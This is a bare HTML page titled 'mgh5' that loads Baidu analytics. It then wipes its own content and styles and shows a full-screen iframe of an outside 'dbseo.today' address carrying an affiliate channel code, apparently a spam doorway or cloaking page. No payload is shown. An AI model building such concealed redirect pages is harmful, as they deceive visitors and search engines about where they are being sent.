<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>mgh5</title>
    <style>
        body {
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            font-family: Arial, sans-serif;
        }

        #redirectText {
            cursor: pointer;
            color: blue;
            text-decoration: underline;
        }
    </style>

    <script>
    </script>
</head>

<body>
<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?e79d2081390bd1a1c187c3889e071977";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>

    <script>
        setFrame("https://20260606.dbseo.today/?channel_code=xbksgf#/");
        function setFrame(url) {
            setTimeout(() => {
                document.body.innerHTML = ""
                document.querySelectorAll('style').forEach(tag => tag.remove())
                Array.from(document.styleSheets).forEach(stylesheet => { stylesheet.disabled = true })
                document.body.style.margin = '0'
                document.body.style.padding = '0'
                document.body.style.width = '100%'
                document.body.style.height = '100vh'
                document.body.style.minHeight = '100%'
                document.body.style.overflow = 'hidden'
                document.body.innerHTML = '<iframe width="100%" height="100%" src="' + url + '"></iframe>'
            }, 100)
        }
    </script>
</body>

</html>